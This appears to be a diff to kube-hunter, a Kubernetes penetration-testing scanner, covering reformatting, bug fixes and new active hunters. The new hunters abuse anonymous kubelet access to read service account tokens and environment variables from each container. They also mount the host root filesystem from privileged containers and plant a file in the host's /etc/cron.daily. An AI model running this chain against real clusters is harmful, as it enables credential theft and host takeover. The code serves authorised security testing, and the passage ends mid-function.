email_pattern = re.compile(rb"([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)")


class CertificateEmail(Vulnerability, Event):
"""Certificate includes an email address"""
"""The Kubernetes API Server advertises a public certificate for TLS.
This certificate includes an email address, that may provide additional information for an attacker on your
organization, or be abused for further email based attacks."""

def __init__(self, email):
Vulnerability.__init__(
self, KubernetesCluster, "Certificate Includes Email Address", category=InformationDisclosure, vid="KHV021",
self,
KubernetesCluster,
"Certificate Includes Email Address",
category=InformationDisclosure,
vid="KHV021",
)
self.email = email
self.evidence = "email: {}".format(self.email)
self.evidence = f"email: {self.email}"


@handler.subscribe(Service)

@@ -42,7 +48,7 @@ class CertificateDiscovery(Hunter):

self.examine_certificate(cert)

def examine_certificate(self, cert):
c = cert.strip(ssl.PEM_HEADER).strip(ssl.PEM_FOOTER)
c = cert.strip(ssl.PEM_HEADER).strip("\n").strip(ssl.PEM_FOOTER).strip("\n")
certdata = base64.b64decode(c)
emails = re.findall(email_pattern, certdata)
for email in emails:
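For context, a minimal sketch (not part of this diff) of what the broadened email pattern now accepts; the certificate excerpt below is made up, the pattern is copied from the hunk above:

```python
import re

# Broadened pattern from this hunk: it now accepts dots, plus signs, hyphens and
# mixed case in the local part, which the old [a-z0-9]-only pattern rejected.
email_pattern = re.compile(rb"([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)")

# Made-up slice of decoded certificate bytes, purely for illustration.
certdata = b"Subject: emailAddress=Ops.Team+k8s@Example-Corp.io, CN=kube-apiserver"
print(re.findall(email_pattern, certdata))  # [b'Ops.Team+k8s@Example-Corp.io']
```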
@@ -33,7 +33,7 @@ class ServerApiVersionEndPointAccessPE(Vulnerability, Event):

class ServerApiVersionEndPointAccessDos(Vulnerability, Event):
"""Node not patched for CVE-2019-1002100. Depending on your RBAC settings,
a crafted json-patch could cause a Denial of Service."""
a crafted json-patch could cause a Denial of Service."""

def __init__(self, evidence):
Vulnerability.__init__(

@@ -52,7 +52,11 @@ class PingFloodHttp2Implementation(Vulnerability, Event):

def __init__(self, evidence):
Vulnerability.__init__(
self, KubernetesCluster, name="Possible Ping Flood Attack", category=DenialOfService, vid="KHV024",
self,
KubernetesCluster,
name="Possible Ping Flood Attack",
category=DenialOfService,
vid="KHV024",
)
self.evidence = evidence

@@ -63,7 +67,11 @@ class ResetFloodHttp2Implementation(Vulnerability, Event):

def __init__(self, evidence):
Vulnerability.__init__(
self, KubernetesCluster, name="Possible Reset Flood Attack", category=DenialOfService, vid="KHV025",
self,
KubernetesCluster,
name="Possible Reset Flood Attack",
category=DenialOfService,
vid="KHV025",
)
self.evidence = evidence

@@ -89,10 +97,14 @@ class IncompleteFixToKubectlCpVulnerability(Vulnerability, Event):

def __init__(self, binary_version):
Vulnerability.__init__(
self, KubectlClient, "Kubectl Vulnerable To CVE-2019-11246", category=RemoteCodeExec, vid="KHV027",
self,
KubectlClient,
"Kubectl Vulnerable To CVE-2019-11246",
category=RemoteCodeExec,
vid="KHV027",
)
self.binary_version = binary_version
self.evidence = "kubectl version: {}".format(self.binary_version)
self.evidence = f"kubectl version: {self.binary_version}"


class KubectlCpVulnerability(Vulnerability, Event):

@@ -101,10 +113,14 @@ class KubectlCpVulnerability(Vulnerability, Event):

def __init__(self, binary_version):
Vulnerability.__init__(
self, KubectlClient, "Kubectl Vulnerable To CVE-2019-1002101", category=RemoteCodeExec, vid="KHV028",
self,
KubectlClient,
"Kubectl Vulnerable To CVE-2019-1002101",
category=RemoteCodeExec,
vid="KHV028",
)
self.binary_version = binary_version
self.evidence = "kubectl version: {}".format(self.binary_version)
self.evidence = f"kubectl version: {self.binary_version}"


class CveUtils:
@@ -16,7 +16,11 @@ class DashboardExposed(Vulnerability, Event):

def __init__(self, nodes):
Vulnerability.__init__(
self, KubernetesCluster, "Dashboard Exposed", category=RemoteCodeExec, vid="KHV029",
self,
KubernetesCluster,
"Dashboard Exposed",
category=RemoteCodeExec,
vid="KHV029",
)
self.evidence = "nodes: {}".format(" ".join(nodes)) if nodes else None
@@ -18,10 +18,14 @@ class PossibleDnsSpoofing(Vulnerability, Event):

def __init__(self, kubedns_pod_ip):
Vulnerability.__init__(
self, KubernetesCluster, "Possible DNS Spoof", category=IdentityTheft, vid="KHV030",
self,
KubernetesCluster,
"Possible DNS Spoof",
category=IdentityTheft,
vid="KHV030",
)
self.kubedns_pod_ip = kubedns_pod_ip
self.evidence = "kube-dns at: {}".format(self.kubedns_pod_ip)
self.evidence = f"kube-dns at: {self.kubedns_pod_ip}"


# Only triggered with RunningAsPod base event

@@ -61,7 +65,9 @@ class DnsSpoofHunter(ActiveHunter):

self_ip = dns_info_res[IP].dst

arp_responses, _ = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"), timeout=config.network_timeout, verbose=0,
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"),
timeout=config.network_timeout,
verbose=0,
)
for _, response in arp_responses:
if response[Ether].src == kubedns_pod_mac:

@@ -70,7 +76,7 @@ class DnsSpoofHunter(ActiveHunter):

def execute(self):
config = get_config()
logger.debug("Attempting to get kube-dns pod ip")
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.netork_timeout)[IP].dst
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)[IP].dst
cbr0_ip, cbr0_mac = self.get_cbr0_ip_mac()

kubedns = self.get_kube_dns_ip_mac()
@@ -26,7 +26,11 @@ class EtcdRemoteWriteAccessEvent(Vulnerability, Event):

def __init__(self, write_res):
Vulnerability.__init__(
self, KubernetesCluster, name="Etcd Remote Write Access Event", category=RemoteCodeExec, vid="KHV031",
self,
KubernetesCluster,
name="Etcd Remote Write Access Event",
category=RemoteCodeExec,
vid="KHV031",
)
self.evidence = write_res

@@ -36,7 +40,11 @@ class EtcdRemoteReadAccessEvent(Vulnerability, Event):

def __init__(self, keys):
Vulnerability.__init__(
self, KubernetesCluster, name="Etcd Remote Read Access Event", category=AccessRisk, vid="KHV032",
self,
KubernetesCluster,
name="Etcd Remote Read Access Event",
category=AccessRisk,
vid="KHV032",
)
self.evidence = keys

@@ -81,6 +89,7 @@ class EtcdRemoteAccessActive(ActiveHunter):

def __init__(self, event):
self.event = event
self.write_evidence = ""
self.event.protocol = "https"

def db_keys_write_access(self):
config = get_config()

@@ -88,7 +97,7 @@ class EtcdRemoteAccessActive(ActiveHunter):

data = {"value": "remotely written data"}
try:
r = requests.post(
f"{self.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys/message",
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys/message",
data=data,
timeout=config.network_timeout,
)

@@ -113,14 +122,16 @@ class EtcdRemoteAccess(Hunter):

self.event = event
self.version_evidence = ""
self.keys_evidence = ""
self.protocol = "https"
self.event.protocol = "https"

def db_keys_disclosure(self):
config = get_config()
logger.debug(f"{self.event.host} Passive hunter is attempting to read etcd keys remotely")
try:
r = requests.get(
f"{self.protocol}://{self.eventhost}:{ETCD_PORT}/v2/keys", verify=False, timeout=config.network_timeout,
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys",
verify=False,
timeout=config.network_timeout,
)
self.keys_evidence = r.content if r.status_code == 200 and r.content != "" else False
return self.keys_evidence

@@ -132,7 +143,7 @@ class EtcdRemoteAccess(Hunter):

logger.debug(f"Trying to check etcd version remotely at {self.event.host}")
try:
r = requests.get(
f"{self.protocol}://{self.event.host}:{ETCD_PORT}/version",
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/version",
verify=False,
timeout=config.network_timeout,
)

@@ -146,7 +157,9 @@ class EtcdRemoteAccess(Hunter):

logger.debug(f"Trying to access etcd insecurely at {self.event.host}")
try:
r = requests.get(
f"http://{self.event.host}:{ETCD_PORT}/version", verify=False, timeout=config.network_timeout,
f"http://{self.event.host}:{ETCD_PORT}/version",
verify=False,
timeout=config.network_timeout,
)
return r.content if r.status_code == 200 and r.content else False
except requests.exceptions.ConnectionError:

@@ -154,10 +167,10 @@ class EtcdRemoteAccess(Hunter):

def execute(self):
if self.insecure_access(): # make a decision between http and https protocol
self.protocol = "http"
self.event.protocol = "http"
if self.version_disclosure():
self.publish_event(EtcdRemoteVersionDisclosureEvent(self.version_evidence))
if self.protocol == "http":
if self.event.protocol == "http":
self.publish_event(EtcdAccessEnabledWithoutAuthEvent(self.version_evidence))
if self.db_keys_disclosure():
self.publish_event(EtcdRemoteReadAccessEvent(self.keys_evidence))
@@ -1,10 +1,12 @@

import json
import logging
import time
from enum import Enum

import re
import requests
import urllib3
import uuid

from kube_hunter.conf import get_config
from kube_hunter.core.events import handler

@@ -33,7 +35,7 @@ class ExposedPodsHandler(Vulnerability, Event):

def __init__(self, pods):
Vulnerability.__init__(
self, component=Kubelet, name="Exposed Pods", category=InformationDisclosure,
self, component=Kubelet, name="Exposed Pods", category=InformationDisclosure, vid="KHV052"
)
self.pods = pods
self.evidence = f"count: {len(self.pods)}"

@@ -45,7 +47,11 @@ class AnonymousAuthEnabled(Vulnerability, Event):

def __init__(self):
Vulnerability.__init__(
self, component=Kubelet, name="Anonymous Authentication", category=RemoteCodeExec, vid="KHV036",
self,
component=Kubelet,
name="Anonymous Authentication",
category=RemoteCodeExec,
vid="KHV036",
)

@@ -54,7 +60,11 @@ class ExposedContainerLogsHandler(Vulnerability, Event):

def __init__(self):
Vulnerability.__init__(
self, component=Kubelet, name="Exposed Container Logs", category=InformationDisclosure, vid="KHV037",
self,
component=Kubelet,
name="Exposed Container Logs",
category=InformationDisclosure,
vid="KHV037",
)

@@ -64,10 +74,14 @@ class ExposedRunningPodsHandler(Vulnerability, Event):

def __init__(self, count):
Vulnerability.__init__(
self, component=Kubelet, name="Exposed Running Pods", category=InformationDisclosure, vid="KHV038",
self,
component=Kubelet,
name="Exposed Running Pods",
category=InformationDisclosure,
vid="KHV038",
)
self.count = count
self.evidence = "{} running pods".format(self.count)
self.evidence = f"{self.count} running pods"


class ExposedExecHandler(Vulnerability, Event):

@@ -75,7 +89,11 @@ class ExposedExecHandler(Vulnerability, Event):

def __init__(self):
Vulnerability.__init__(
self, component=Kubelet, name="Exposed Exec On Container", category=RemoteCodeExec, vid="KHV039",
self,
component=Kubelet,
name="Exposed Exec On Container",
category=RemoteCodeExec,
vid="KHV039",
)

@@ -84,7 +102,11 @@ class ExposedRunHandler(Vulnerability, Event):

def __init__(self):
Vulnerability.__init__(
self, component=Kubelet, name="Exposed Run Inside Container", category=RemoteCodeExec, vid="KHV040",
self,
component=Kubelet,
name="Exposed Run Inside Container",
category=RemoteCodeExec,
vid="KHV040",
)

@@ -93,7 +115,11 @@ class ExposedPortForwardHandler(Vulnerability, Event):

def __init__(self):
Vulnerability.__init__(
self, component=Kubelet, name="Exposed Port Forward", category=RemoteCodeExec, vid="KHV041",
self,
component=Kubelet,
name="Exposed Port Forward",
category=RemoteCodeExec,
vid="KHV041",
)

@@ -103,7 +129,11 @@ class ExposedAttachHandler(Vulnerability, Event):

def __init__(self):
Vulnerability.__init__(
self, component=Kubelet, name="Exposed Attaching To Container", category=RemoteCodeExec, vid="KHV042",
self,
component=Kubelet,
name="Exposed Attaching To Container",
category=RemoteCodeExec,
vid="KHV042",
)

@@ -113,19 +143,43 @@ class ExposedHealthzHandler(Vulnerability, Event):

def __init__(self, status):
Vulnerability.__init__(
self, component=Kubelet, name="Cluster Health Disclosure", category=InformationDisclosure, vid="KHV043",
self,
component=Kubelet,
name="Cluster Health Disclosure",
category=InformationDisclosure,
vid="KHV043",
)
self.status = status
self.evidence = f"status: {self.status}"


class ExposedExistingPrivilegedContainersViaSecureKubeletPort(Vulnerability, Event):
"""A malicious actor, that has confirmed anonymous access to the API via the kubelet's secure port, \
can leverage the existing privileged containers identified to damage the host and potentially \
the whole cluster"""

def __init__(self, exposed_existing_privileged_containers):
Vulnerability.__init__(
self,
component=KubernetesCluster,
name="Exposed Existing Privileged Container(s) Via Secure Kubelet Port",
category=AccessRisk,
vid="KHV051",
)
self.exposed_existing_privileged_containers = exposed_existing_privileged_containers


class PrivilegedContainers(Vulnerability, Event):
"""A Privileged container exist on a node
could expose the node/cluster to unwanted root operations"""

def __init__(self, containers):
Vulnerability.__init__(
self, component=KubernetesCluster, name="Privileged Container", category=AccessRisk, vid="KHV044",
self,
component=KubernetesCluster,
name="Privileged Container",
category=AccessRisk,
vid="KHV044",
)
self.containers = containers
self.evidence = f"pod: {containers[0][0]}, " f"container: {containers[0][1]}, " f"count: {len(containers)}"
@@ -136,7 +190,11 @@ class ExposedSystemLogs(Vulnerability, Event):

def __init__(self):
Vulnerability.__init__(
self, component=Kubelet, name="Exposed System Logs", category=InformationDisclosure, vid="KHV045",
self,
component=Kubelet,
name="Exposed System Logs",
category=InformationDisclosure,
vid="KHV045",
)

@@ -145,7 +203,11 @@ class ExposedKubeletCmdline(Vulnerability, Event):

def __init__(self, cmdline):
Vulnerability.__init__(
self, component=Kubelet, name="Exposed Kubelet Cmdline", category=InformationDisclosure, vid="KHV046",
self,
component=Kubelet,
name="Exposed Kubelet Cmdline",
category=InformationDisclosure,
vid="KHV046",
)
self.cmdline = cmdline
self.evidence = f"cmdline: {self.cmdline}"

@@ -244,7 +306,7 @@ class SecureKubeletPortHunter(Hunter):

""" all methods will return the handler name if successful """

def __init__(self, path, pod, session=None):
self.path = path
self.path = path + ("/" if not path.endswith("/") else "")
self.session = session if session else requests.Session()
self.pod = pod

@@ -252,7 +314,9 @@ class SecureKubeletPortHunter(Hunter):

def test_container_logs(self):
config = get_config()
logs_url = self.path + KubeletHandlers.CONTAINERLOGS.value.format(
pod_namespace=self.pod["namespace"], pod_id=self.pod["name"], container_name=self.pod["container"],
pod_namespace=self.pod["namespace"],
pod_id=self.pod["name"],
container_name=self.pod["container"],
)
return self.session.get(logs_url, verify=False, timeout=config.network_timeout).status_code == 200

@@ -270,36 +334,46 @@ class SecureKubeletPortHunter(Hunter):

return (
"/cri/exec/"
in self.session.get(
exec_url, headers=headers, allow_redirects=False, verify=False, timeout=config.network_timeout,
exec_url,
headers=headers,
allow_redirects=False,
verify=False,
timeout=config.network_timeout,
).text
)

# need further investigation on websockets protocol for further implementation
def test_port_forward(self):
config = get_config()
headers = {
"Upgrade": "websocket",
"Connection": "Upgrade",
"Sec-Websocket-Key": "s",
"Sec-Websocket-Version": "13",
"Sec-Websocket-Protocol": "SPDY",
}
pf_url = self.path + KubeletHandlers.PORTFORWARD.value.format(
pod_namespace=self.pod["namespace"], pod_id=self.pod["name"], port=80,
)
self.session.get(
pf_url, headers=headers, verify=False, stream=True, timeout=config.network_timeout,
).status_code == 200
pass
# TODO: what to return?
# Example starting code:
#
# config = get_config()
# headers = {
# "Upgrade": "websocket",
# "Connection": "Upgrade",
# "Sec-Websocket-Key": "s",
# "Sec-Websocket-Version": "13",
# "Sec-Websocket-Protocol": "SPDY",
# }
# pf_url = self.path + KubeletHandlers.PORTFORWARD.value.format(
# pod_namespace=self.pod["namespace"],
# pod_id=self.pod["name"],
# port=80,
# )

# executes one command and returns output
def test_run_container(self):
config = get_config()
run_url = self.path + KubeletHandlers.RUN.value.format(
pod_namespace="test", pod_id="test", container_name="test", cmd="",
pod_namespace="test",
pod_id="test",
container_name="test",
cmd="",
)
# if we get a Method Not Allowed, we know we passed Authentication and Authorization.
return self.session.get(run_url, verify=False, timeout=config.network_timeout).status_code == 405
# if we get this message, we know we passed Authentication and Authorization, and that the endpoint is enabled.
status_code = self.session.post(run_url, verify=False, timeout=config.network_timeout).status_code
return status_code == requests.codes.NOT_FOUND
# returns list of currently running pods
def test_running_pods(self):

@@ -321,7 +395,10 @@ class SecureKubeletPortHunter(Hunter):

return (
"/cri/attach/"
in self.session.get(
attach_url, allow_redirects=False, verify=False, timeout=config.network_timeout,
attach_url,
allow_redirects=False,
verify=False,
timeout=config.network_timeout,
).text
)

@@ -329,7 +406,8 @@ class SecureKubeletPortHunter(Hunter):

def test_logs_endpoint(self):
config = get_config()
logs_url = self.session.get(
self.path + KubeletHandlers.LOGS.value.format(path=""), timeout=config.network_timeout,
self.path + KubeletHandlers.LOGS.value.format(path=""),
timeout=config.network_timeout,
).text
return "<pre>" in logs_url

@@ -337,7 +415,9 @@ class SecureKubeletPortHunter(Hunter):

def test_pprof_cmdline(self):
config = get_config()
cmd = self.session.get(
self.path + KubeletHandlers.PPROF_CMDLINE.value, verify=False, timeout=config.network_timeout,
self.path + KubeletHandlers.PPROF_CMDLINE.value,
verify=False,
timeout=config.network_timeout,
)
return cmd.text if cmd.status_code == 200 else None

@@ -349,7 +429,7 @@ class SecureKubeletPortHunter(Hunter):

# self.session.cert = self.event.client_cert
# copy session to event
self.event.session = self.session
self.path = "https://{self.event.host}:10250"
self.path = f"https://{self.event.host}:10250"
self.kubehunter_pod = {
"name": "kube-hunter",
"namespace": "default",

@@ -425,7 +505,7 @@ class SecureKubeletPortHunter(Hunter):

pod_data = next(filter(is_kubesystem_pod, pods_data), None)

if pod_data:
container_data = next(pod_data["spec"]["containers"], None)
container_data = pod_data["spec"]["containers"][0]
if container_data:
return {
"name": pod_data["metadata"]["name"],

@@ -434,6 +514,521 @@ class SecureKubeletPortHunter(Hunter):

}
""" Active Hunters """
|
||||
|
||||
|
||||
@handler.subscribe(AnonymousAuthEnabled)
|
||||
class ProveAnonymousAuth(ActiveHunter):
|
||||
"""Foothold Via Secure Kubelet Port
|
||||
Attempts to demonstrate that a malicious actor can establish foothold into the cluster via a
|
||||
container abusing the configuration of the kubelet's secure port: authentication-auth=false.
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.base_url = f"https://{self.event.host}:10250/"
|
||||
|
||||
def get_request(self, url, verify=False):
|
||||
config = get_config()
|
||||
try:
|
||||
response_text = self.event.session.get(url=url, verify=verify, timeout=config.network_timeout).text.rstrip()
|
||||
|
||||
return response_text
|
||||
except Exception as ex:
|
||||
logging.debug("Exception: " + str(ex))
|
||||
return "Exception: " + str(ex)
|
||||
|
||||
def post_request(self, url, params, verify=False):
|
||||
config = get_config()
|
||||
try:
|
||||
response_text = self.event.session.post(
|
||||
url=url, verify=verify, params=params, timeout=config.network_timeout
|
||||
).text.rstrip()
|
||||
|
||||
return response_text
|
||||
except Exception as ex:
|
||||
logging.debug("Exception: " + str(ex))
|
||||
return "Exception: " + str(ex)
|
||||
|
||||
@staticmethod
|
||||
def has_no_exception(result):
|
||||
return "Exception: " not in result
|
||||
|
||||
@staticmethod
|
||||
def has_no_error(result):
|
||||
possible_errors = ["exited with", "Operation not permitted", "Permission denied", "No such file or directory"]
|
||||
|
||||
return not any(error in result for error in possible_errors)
|
||||
|
||||
@staticmethod
|
||||
def has_no_error_nor_exception(result):
|
||||
return ProveAnonymousAuth.has_no_error(result) and ProveAnonymousAuth.has_no_exception(result)
|
||||
|
||||
def cat_command(self, run_request_url, full_file_path):
|
||||
return self.post_request(run_request_url, {"cmd": f"cat {full_file_path}"})
|
||||
|
||||
def process_container(self, run_request_url):
|
||||
service_account_token = self.cat_command(run_request_url, "/var/run/secrets/kubernetes.io/serviceaccount/token")
|
||||
|
||||
environment_variables = self.post_request(run_request_url, {"cmd": "env"})
|
||||
|
||||
if self.has_no_error_nor_exception(service_account_token):
|
||||
return {
|
||||
"result": True,
|
||||
"service_account_token": service_account_token,
|
||||
"environment_variables": environment_variables,
|
||||
}
|
||||
|
||||
return {"result": False}
|
||||
|
||||
def execute(self):
|
||||
pods_raw = self.get_request(self.base_url + KubeletHandlers.PODS.value)
|
||||
|
||||
# At this point, the following must happen:
|
||||
# a) we get the data of the running pods
|
||||
# b) we get a forbidden message because the API server
|
||||
# has a configuration that denies anonymous attempts despite the kubelet being vulnerable
|
||||
|
||||
if self.has_no_error_nor_exception(pods_raw) and "items" in pods_raw:
|
||||
pods_data = json.loads(pods_raw)["items"]
|
||||
|
||||
temp_message = ""
|
||||
exposed_existing_privileged_containers = list()
|
||||
|
||||
for pod_data in pods_data:
|
||||
pod_namespace = pod_data["metadata"]["namespace"]
|
||||
pod_id = pod_data["metadata"]["name"]
|
||||
|
||||
for container_data in pod_data["spec"]["containers"]:
|
||||
container_name = container_data["name"]
|
||||
|
||||
run_request_url = self.base_url + f"run/{pod_namespace}/{pod_id}/{container_name}"
|
||||
|
||||
extracted_data = self.process_container(run_request_url)
|
||||
|
||||
if extracted_data["result"]:
|
||||
service_account_token = extracted_data["service_account_token"]
|
||||
environment_variables = extracted_data["environment_variables"]
|
||||
|
||||
temp_message += (
|
||||
f"\n\nPod namespace: {pod_namespace}"
|
||||
+ f"\n\nPod ID: {pod_id}"
|
||||
+ f"\n\nContainer name: {container_name}"
|
||||
+ f"\n\nService account token: {service_account_token}"
|
||||
+ f"\nEnvironment variables: {environment_variables}"
|
||||
)
|
||||
|
||||
first_check = container_data.get("securityContext", {}).get("privileged")
|
||||
|
||||
first_subset = container_data.get("securityContext", {})
|
||||
second_subset = first_subset.get("capabilities", {})
|
||||
data_for_second_check = second_subset.get("add", [])
|
||||
|
||||
second_check = "SYS_ADMIN" in data_for_second_check
|
||||
|
||||
if first_check or second_check:
|
||||
exposed_existing_privileged_containers.append(
|
||||
{
|
||||
"pod_namespace": pod_namespace,
|
||||
"pod_id": pod_id,
|
||||
"container_name": container_name,
|
||||
"service_account_token": service_account_token,
|
||||
"environment_variables": environment_variables,
|
||||
}
|
||||
)
|
||||
|
||||
if temp_message:
|
||||
message = "The following containers have been successfully breached." + temp_message
|
||||
|
||||
self.event.evidence = f"{message}"
|
||||
|
||||
if exposed_existing_privileged_containers:
|
||||
self.publish_event(
|
||||
ExposedExistingPrivilegedContainersViaSecureKubeletPort(
|
||||
exposed_existing_privileged_containers=exposed_existing_privileged_containers
|
||||
)
|
||||
)
|
||||
|
||||
|
||||
@handler.subscribe(ExposedExistingPrivilegedContainersViaSecureKubeletPort)
class MaliciousIntentViaSecureKubeletPort(ActiveHunter):
"""Malicious Intent Via Secure Kubelet Port
Attempts to demonstrate that a malicious actor can leverage existing privileged containers
exposed via the kubelet's secure port, due to anonymous auth enabled misconfiguration,
such that a process can be started or modified on the host.
"""

def __init__(self, event, seconds_to_wait_for_os_command=1):
self.event = event
self.base_url = f"https://{self.event.host}:10250/"
self.seconds_to_wait_for_os_command = seconds_to_wait_for_os_command
self.number_of_rm_attempts = 5
self.number_of_rmdir_attempts = 5
self.number_of_umount_attempts = 5

def post_request(self, url, params, verify=False):
config = get_config()
try:
response_text = self.event.session.post(
url, verify, params=params, timeout=config.network_timeout
).text.rstrip()

return response_text
except Exception as ex:
logging.debug("Exception: " + str(ex))
return "Exception: " + str(ex)

def cat_command(self, run_request_url, full_file_path):
return self.post_request(run_request_url, {"cmd": f"cat {full_file_path}"})

def clean_attacked_exposed_existing_privileged_container(
self,
run_request_url,
file_system_or_partition,
directory_created,
file_created,
number_of_rm_attempts,
number_of_umount_attempts,
number_of_rmdir_attempts,
seconds_to_wait_for_os_command,
):

self.rm_command(
run_request_url,
f"{directory_created}/etc/cron.daily/{file_created}",
number_of_rm_attempts,
seconds_to_wait_for_os_command,
)

self.umount_command(
run_request_url,
file_system_or_partition,
directory_created,
number_of_umount_attempts,
seconds_to_wait_for_os_command,
)

self.rmdir_command(
run_request_url,
directory_created,
number_of_rmdir_attempts,
seconds_to_wait_for_os_command,
)

def check_file_exists(self, run_request_url, file):
file_exists = self.ls_command(run_request_url=run_request_url, file_or_directory=file)

return ProveAnonymousAuth.has_no_error_nor_exception(file_exists)

def rm_command(self, run_request_url, file_to_remove, number_of_rm_attempts, seconds_to_wait_for_os_command):
if self.check_file_exists(run_request_url, file_to_remove):
for _ in range(number_of_rm_attempts):
command_execution_outcome = self.post_request(run_request_url, {"cmd": f"rm -f {file_to_remove}"})

if seconds_to_wait_for_os_command:
time.sleep(seconds_to_wait_for_os_command)

first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome)
second_check = self.check_file_exists(run_request_url, file_to_remove)

if first_check and not second_check:
return True

pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1]
container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2]
logger.warning(
"kube-hunter: "
+ "POD="
+ pod_id
+ ", "
+ "CONTAINER="
+ container_name
+ " - Unable to remove file: "
+ file_to_remove
)

return False

def chmod_command(self, run_request_url, permissions, file):
return self.post_request(run_request_url, {"cmd": f"chmod {permissions} {file}"})

def touch_command(self, run_request_url, file_to_create):
return self.post_request(run_request_url, {"cmd": f"touch {file_to_create}"})

def attack_exposed_existing_privileged_container(
self, run_request_url, directory_created, number_of_rm_attempts, seconds_to_wait_for_os_command, file_name=None
):
if file_name is None:
file_name = "kube-hunter" + str(uuid.uuid1())

file_name_with_path = f"{directory_created}/etc/cron.daily/{file_name}"

file_created = self.touch_command(run_request_url, file_name_with_path)

if ProveAnonymousAuth.has_no_error_nor_exception(file_created):
permissions_changed = self.chmod_command(run_request_url, "755", file_name_with_path)

if ProveAnonymousAuth.has_no_error_nor_exception(permissions_changed):
return {"result": True, "file_created": file_name}

self.rm_command(run_request_url, file_name_with_path, number_of_rm_attempts, seconds_to_wait_for_os_command)

return {"result": False}

def check_directory_exists(self, run_request_url, directory):
directory_exists = self.ls_command(run_request_url=run_request_url, file_or_directory=directory)

return ProveAnonymousAuth.has_no_error_nor_exception(directory_exists)

def rmdir_command(
self,
run_request_url,
directory_to_remove,
number_of_rmdir_attempts,
seconds_to_wait_for_os_command,
):
if self.check_directory_exists(run_request_url, directory_to_remove):
for _ in range(number_of_rmdir_attempts):
command_execution_outcome = self.post_request(run_request_url, {"cmd": f"rmdir {directory_to_remove}"})

if seconds_to_wait_for_os_command:
time.sleep(seconds_to_wait_for_os_command)

first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome)
second_check = self.check_directory_exists(run_request_url, directory_to_remove)

if first_check and not second_check:
return True

pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1]
container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2]
logger.warning(
"kube-hunter: "
+ "POD="
+ pod_id
+ ", "
+ "CONTAINER="
+ container_name
+ " - Unable to remove directory: "
+ directory_to_remove
)

return False
def ls_command(self, run_request_url, file_or_directory):
return self.post_request(run_request_url, {"cmd": f"ls {file_or_directory}"})

def umount_command(
self,
run_request_url,
file_system_or_partition,
directory,
number_of_umount_attempts,
seconds_to_wait_for_os_command,
):
# Note: the logic implemented proved more reliable than using "df"
# command to resolve for mounted systems/partitions.
current_files_and_directories = self.ls_command(run_request_url, directory)

if self.ls_command(run_request_url, directory) == current_files_and_directories:
for _ in range(number_of_umount_attempts):
# Ref: http://man7.org/linux/man-pages/man2/umount.2.html
command_execution_outcome = self.post_request(
run_request_url, {"cmd": f"umount {file_system_or_partition} {directory}"}
)

if seconds_to_wait_for_os_command:
time.sleep(seconds_to_wait_for_os_command)

first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome)
second_check = self.ls_command(run_request_url, directory) != current_files_and_directories

if first_check and second_check:
return True

pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1]
container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2]
logger.warning(
"kube-hunter: "
+ "POD="
+ pod_id
+ ", "
+ "CONTAINER="
+ container_name
+ " - Unable to unmount "
+ file_system_or_partition
+ " at: "
+ directory
)

return False

def mount_command(self, run_request_url, file_system_or_partition, directory):
# Ref: http://man7.org/linux/man-pages/man1/mkdir.1.html
return self.post_request(run_request_url, {"cmd": f"mount {file_system_or_partition} {directory}"})

def mkdir_command(self, run_request_url, directory_to_create):
# Ref: http://man7.org/linux/man-pages/man1/mkdir.1.html
return self.post_request(run_request_url, {"cmd": f"mkdir {directory_to_create}"})

def findfs_command(self, run_request_url, file_system_or_partition_type, file_system_or_partition):
# Ref: http://man7.org/linux/man-pages/man8/findfs.8.html
return self.post_request(
run_request_url, {"cmd": f"findfs {file_system_or_partition_type}{file_system_or_partition}"}
)

def get_root_values(self, command_line):
for command in command_line.split(" "):
# Check for variable-definition commands as there can be commands which don't define variables.
if "=" in command:
split = command.split("=")
if split[0] == "root":
if len(split) > 2:
# Potential valid scenario: root=LABEL=example
root_value_type = split[1] + "="
root_value = split[2]

return root_value, root_value_type
else:
root_value_type = ""
root_value = split[1]

return root_value, root_value_type

return None, None

def process_exposed_existing_privileged_container(
self,
run_request_url,
number_of_umount_attempts,
number_of_rmdir_attempts,
seconds_to_wait_for_os_command,
directory_to_create=None,
):
if directory_to_create is None:
directory_to_create = "/kube-hunter_" + str(uuid.uuid1())

# /proc/cmdline - This file shows the parameters passed to the kernel at the time it is started.
command_line = self.cat_command(run_request_url, "/proc/cmdline")

if ProveAnonymousAuth.has_no_error_nor_exception(command_line):
if len(command_line.split(" ")) > 0:
root_value, root_value_type = self.get_root_values(command_line)

# Move forward only when the "root" variable value was actually defined.
if root_value:
if root_value_type:
file_system_or_partition = self.findfs_command(run_request_url, root_value_type, root_value)
else:
file_system_or_partition = root_value

if ProveAnonymousAuth.has_no_error_nor_exception(file_system_or_partition):
directory_created = self.mkdir_command(run_request_url, directory_to_create)

if ProveAnonymousAuth.has_no_error_nor_exception(directory_created):
directory_created = directory_to_create

mounted_file_system_or_partition = self.mount_command(
run_request_url, file_system_or_partition, directory_created
)

if ProveAnonymousAuth.has_no_error_nor_exception(mounted_file_system_or_partition):
host_name = self.cat_command(run_request_url, f"{directory_created}/etc/hostname")

if ProveAnonymousAuth.has_no_error_nor_exception(host_name):
return {
"result": True,
"file_system_or_partition": file_system_or_partition,
"directory_created": directory_created,
}

